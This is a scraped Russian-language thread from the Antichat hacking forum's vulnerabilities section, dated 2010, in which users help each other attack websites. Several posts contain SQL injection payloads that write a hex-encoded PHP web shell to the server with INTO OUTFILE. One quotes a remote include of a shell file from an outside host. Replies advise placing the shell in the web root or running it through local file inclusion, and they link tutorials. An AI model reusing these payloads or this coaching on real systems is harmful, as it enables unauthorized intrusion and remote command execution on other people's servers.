ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13281  
Старый 19.05.2010, 09:24
Аватар для budden
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031

Репутация: 184
По умолчанию

Цитата:
Сообщение от GOGA075  
пробовал так
и
cmd=include($_GET['http://site.ru/downloads/shell.txt']);

нефига не работают!!
меня одного смутило?
 
Ответить с цитированием

  #13282  
Старый 19.05.2010, 22:11
Аватар для Saiga
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

Цитата:
Сообщение от Iceangel_  
да


@@datadir


прочитать этот файл через load_file




P.S. Я на все твои вопросы ответил, ответь на 1 мой. Сколько нужно курить, чтобы составить этот запрос?
Спасибо..

Посидел почитал ... понял что за бред написал ( Буду курить менче )

Воспользовался советами :

Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись

Попробовал залить в категорию :/var/lib/mysql/ipw18/
следующим образам

6+union+select+0x3c3f7068702073797374656d28245f474 5545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+

На что мне ругнулся сайт, значит всё норм ....
теперь не могу догнать как его прочесть ?
пробовал www.site.com/2.php?cmd=dir .. но нифига



Решил попробовать пойти другим путем:

union+select+0x3c3f7068702073797374656d28245f47455 45b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+

здесь тодзе вопрос, ww.site.com/????? (нужна cmd)


Народ я хоть в правильном направление двигаюсь ?

Последний раз редактировалось Saiga; 19.05.2010 в 22:14..
 
Ответить с цитированием

  #13283  
Старый 19.05.2010, 22:22
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Saiga  
Спасибо..

Посидел почитал ... понял что за бред написал ( Буду курить менче )

Воспользовался советами :

Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись

Попробовал залить в категорию :/var/lib/mysql/ipw18/
следующим образам

6+union+select+0x3c3f7068702073797374656d28245f474 5545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+

На что мне ругнулся сайт, значит всё норм ....
теперь не могу догнать как его прочесть ?
пробовал www.site.com/2.php?cmd=dir .. но нифига



Решил попробовать пойти другим путем:

union+select+0x3c3f7068702073797374656d28245f47455 45b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+

здесь тодзе вопрос, ww.site.com/????? (нужна cmd)


Народ я хоть в правильном направление двигаюсь ?

в веб-директорию сайта заливать нужно.
 
Ответить с цитированием

  #13284  
Старый 19.05.2010, 22:23
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от Saiga  
Спасибо..

Посидел почитал ... понял что за бред написал ( Буду курить менче )

Воспользовался советами :

Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись

Попробовал залить в категорию :/var/lib/mysql/ipw18/
следующим образам

6+union+select+0x3c3f7068702073797374656d28245f474 5545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+

На что мне ругнулся сайт, значит всё норм ....
теперь не могу догнать как его прочесть ?
пробовал www.site.com/2.php?cmd=dir .. но нифига



Решил попробовать пойти другим путем:

union+select+0x3c3f7068702073797374656d28245f47455 45b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+

здесь тодзе вопрос, ww.site.com/????? (нужна cmd)


Народ я хоть в правильном направление двигаюсь ?
/tmp/ - директория не доступная с веба.
Если льете в нее, то необходим lfi, что-бы этот файл проинклудить и выполнить.
Насчет www.site.com/2.php?cmd=dir, а файл то создался? Если файл создался, но выполнения команд нету, то скорее всего, вы залили неверное содержимое.
 
Ответить с цитированием

  #13285  
Старый 19.05.2010, 23:54
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Сообщение от .Slip  
Цитата:
Сообщение от pinch  
Microsoft JET Database Engine error '80040e14'

значит бд у нас Microsoft JET Database. следовательно запросы передаются на низком уровне. =(((
Можно поподробнее про передачу запросов на низком уровне? Спасибо.
Поднимаю свой вопрос. Не могу спокойно спать, всё время думаю о низкоуровневых запросах.
 
Ответить с цитированием

  #13286  
Старый 20.05.2010, 00:04
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

.Slip

кажется я что то нашел,но не уверен

http://www.citforum.ru/database/cache/gateway/

Последний раз редактировалось Konqi; 20.05.2010 в 00:24..
 
Ответить с цитированием

  #13287  
Старый 20.05.2010, 00:26
Аватар для Saiga
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

Цитата:
Сообщение от m0Hze  
/tmp/ - директория не доступная с веба.
Если льете в нее, то необходим lfi, что-бы этот файл проинклудить и выполнить.
Насчет www.site.com/2.php?cmd=dir, а файл то создался? Если файл создался, но выполнения команд нету, то скорее всего, вы залили неверное содержимое.
Спс

в /var/lib/mysql/ipw18/www/ нельзя делать запись.
(Can't create/write to file '/var/lib/mysql/ipw18/www/2.php' (Errcode: 2)


По поводу local file include..
где можна с этим ознакомится .. в googl.ru ничего покачто не нашел (что мог бы переварит и понять )

Куда еще можна залить шелл кроме как ('site/www') или ('tmp')
Для меня это тёмный лес покачто, если есть статья то поделитесь люди добрые (link)
 
Ответить с цитированием

  #13288  
Старый 20.05.2010, 00:27
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Saiga  
По поводу local file include..
где можна с этим ознакомится .. в googl.ru ничего покачто не нашел (что мог бы переварит и понять )
http://forum.antichat.ru/nextnewesttothread30606.html
https://forum.antichat.net/showthread.php?p=188561
 
Ответить с цитированием

  #13289  
Старый 20.05.2010, 00:28
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Про лфи - это ко мне, дооо. Просто пока ми изучаю низкоуровневые MSSQL inj
 
Ответить с цитированием

  #13290  
Старый 20.05.2010, 00:34
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от .Slip  
...
там низкоуровневые запросы в SQL. "ну ты понел" (с)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ